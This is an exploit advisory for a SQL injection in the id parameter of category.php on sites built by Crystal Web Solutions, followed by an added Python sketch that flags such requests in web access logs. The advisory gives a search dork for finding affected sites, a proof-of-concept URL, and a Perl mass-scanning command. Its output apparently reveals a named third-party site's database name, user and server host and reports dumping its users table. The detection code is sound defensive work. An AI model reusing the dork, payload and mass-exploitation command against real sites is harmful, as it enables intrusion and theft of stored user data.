Crystal Web Solutions suffers from a remote SQL injection vulnerability.
=============================================================
Crystal Web Solutions (category.php) SQL Injection
=============================================================
Vendor: Crystal Web Solutions ( http://www.crystal-web.co.uk)
Vendor Notification: 02 Jan 2011
Vulnerability Type: SQL Injection
Status: FIXED
Risk level: Low
Credit: All my Friends
Dork: "Web Design by Crystal Web Solutions"
POC:
- Http://LocalHost.com/path/category.php?id= [SQLi]
$ cd /Mysql/Perl
$ perl ec.txt -list crystalwebsolutions.txt -x /category.php?id=100 -v 5
........
Get: http://www.plantation-inn.co.uk/category.php?id=100'
[x] Gathering Server Configuration...
-Database: 108519_plantation
-User: 108519_piuser@lnh-www1h.bluehalo.myregisteredsite.com
-Version: 5.0.77
[x] Dumping database "108519_plantation" TB "users"
done.
=============================================================
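
A detection sketch for the request pattern shown in the PoC above (a quote appended to the numeric id parameter of category.php), as an added example that is not part of the original advisory. It scans web access-log lines and flags any category.php request whose id is not a plain integer. The log lines, IP addresses, user agents and the function name are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format).
# The IP addresses come from documentation ranges; nothing here is real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [02/Jan/2011:10:00:01 +0000] "GET /category.php?id=100 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [02/Jan/2011:10:00:05 +0000] "GET /category.php?id=100' HTTP/1.1" 200 312 "-" "libwww-perl/5.805"
198.51.100.7 - - [02/Jan/2011:10:00:06 +0000] "GET /category.php?id=100%27 HTTP/1.1" 200 312 "-" "libwww-perl/5.805"
192.0.2.11 - - [02/Jan/2011:10:01:00 +0000] "GET /index.php?id=abc HTTP/1.1" 200 900 "-" "Mozilla/5.0"
192.0.2.12 - - [02/Jan/2011:10:02:00 +0000] "GET /shop/category.php?page=2 HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

# Client address and request target from one combined-log-format line.
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST|HEAD) (\S+) [^"]*"')


def suspicious_id_requests(log_text, script="category.php", param="id"):
    """Return (client_ip, decoded_value) for every request to `script`
    whose `param` value is not a plain integer (hypothetical helper)."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parsable request line
        ip, target = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/" + script):
            continue  # a different script
        # parse_qs percent-decodes, so %27 and a literal quote look the same.
        values = parse_qs(url.query, keep_blank_values=True).get(param)
        if values is None:
            continue  # parameter not present in this request
        for value in values:
            if not re.fullmatch(r"[0-9]{1,10}", value):
                hits.append((ip, value))
    return hits


if __name__ == "__main__":
    for ip, value in suspicious_id_requests(SAMPLE_LOG):
        print(f"{ip} sent non-numeric id: {value!r}")
```

The same integer-only rule is the input check the script itself should enforce before the value reaches a query, alongside parameterized statements.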